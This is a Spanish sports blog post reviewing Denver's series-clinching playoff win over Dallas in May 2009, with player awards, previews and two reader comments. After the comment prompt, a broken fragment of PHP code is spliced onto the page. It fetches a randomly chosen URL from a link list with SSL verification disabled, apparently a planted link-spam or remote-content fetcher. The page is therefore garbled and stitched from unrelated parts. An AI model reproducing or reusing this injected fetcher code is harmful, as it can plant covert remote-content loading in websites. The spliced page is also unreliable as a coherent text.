Playoffs (13/05/2009): Good bye, Cuban!

14 de May de 2009 por TheDeerHunter

Se esperaba noche de vendetta tras los desagradables acontecimientos que tuvieron lugar en Dallas tras el tercer partido de la serie. Cuban insultó a la madre de Kenyon Martin y la exuberante novia de Melo fue expulsada del pabellón tras montarla como una verdulera en las gradas del American Airlines Center. Quizás, varias declaraciones conciliadoras y el duelo de baloncesto puro que se vivió en el cuarto aplacaron un tanto los ánimos y finalmente hemos podido disfrutar más del propio espectáculo que de cualquier otro aditivo externo. Ha habido tensión, sí, típica de Playoffs, pero se puede decir que el partido ha sido de guante blanco, como no podía ser de otra forma con el nivel de artistas que había en pista.

No ha habido manera y la aportación defensiva de Carlisle finalmente no se ha notado en toda la serie para disfrute de cualquier aficionado que no sea seguidor de Dallas. Anoche encajó 124 puntos con porcentajes altísimos por parte de Denver. El duelo de francotiradores Melo-Nowitzki, en esta serie, ha alcanzado la calificación de antológico.

Sin embargo, por lo igualado, no ha sido ese duelo el que decantó ayer el partido y la serie en favor de Denver, ni apenas el Billups-Kidd que, como se esperaba, ha ganado el primero. El punto más desequilibrante ha sido, otra vez más, el duelo de sextos hombres entre el ganador del premio, Jason Terry, y J.R. Smith, quien ha dejado en evidencia a quienes se lo negaron. Anoche volvió a resultar un puñal desde fuera, mientras que Terry, saliendo de titular, fracasó en el peor momento posible.

Otro detalle fundamental fue la diferencia de rebotes. Por ahí Dampier tenía mucho que decir pero únicamente agarró 2 en los 24 minutos de juego que disfrutó, o lo que es lo mismo, 1 rebote cada 12 minutos. El dato impresiona. La masacre que ha causado Nené en la zona de Dallas viene desde ese punto. Se supone que Erick venía tocado… Ya tenemos excusa, no hay problema. El año que viene, más.

Lo mismo podemos concluir de Josh Howard, que para montar pollos y pegar a los cámaras no se le notaba merma ninguna. El caso es que este chico por “H” o por “B” siempre decepciona en los momentos importantes.

PREMIOS

MVP: La pareja Billups-Carmelo cuajó un sensacional partido con 58 puntos, 12 rebotes y 15 asistencias entre los 2. Dallas no ha podido pararlos en toda la serie.

Sorpresa: Evidentemente no es una sorpresa, pero la aportación de JR Smith en este partido y en la serie en general se ha de remarcar. 18 puntos, 5 rebotes y 6 asistencias ayer.

Decepción: Después de dar señales de vida en la eliminatoria frente los Spurs, Erick Dampier se ha hundido. 6 puntos y 2 rebotitos en 24 minutos no son números de un pívot titular de un equipo de Playoffs. Nené ha campado a sus anchas.

Esfuerzo en vano: El de Dirk “Yo contra el mundo” Nowitzki. Una vez más. 32 puntos, 10 rebotes y 7 asistencias.

RAZONES PARA TRASNOCHAR

Los Lakers tienen todo a favor para cerrar definitivamente la eliminatoria. Si no les entran una de esas pájaras que a veces sufren no deberían tener más problemas de los esperados para eliminar a un equipo que no cuenta con T-Mac ni Yao Ming. En todo caso tendrán que salir hiper concentrados (3h30 hora española).

Por su parte, los Magic se enfrentan al primer match-ball en contra. Jugando en su casa y enrabietados por su última derrota lo más normal parece ser que ganen y fuercen el séptimo. Una vez allí… sólo el más fuerte sobrevive (1h00).

Comenta

2 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    más les vale a L.A cerrar la eliminatoria hoy

    cuidadito con Denver

      Citar

  2. aro_pasado_no_newtoniano dice:
    #2

    Aún le pasa poco a la novia de Melo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>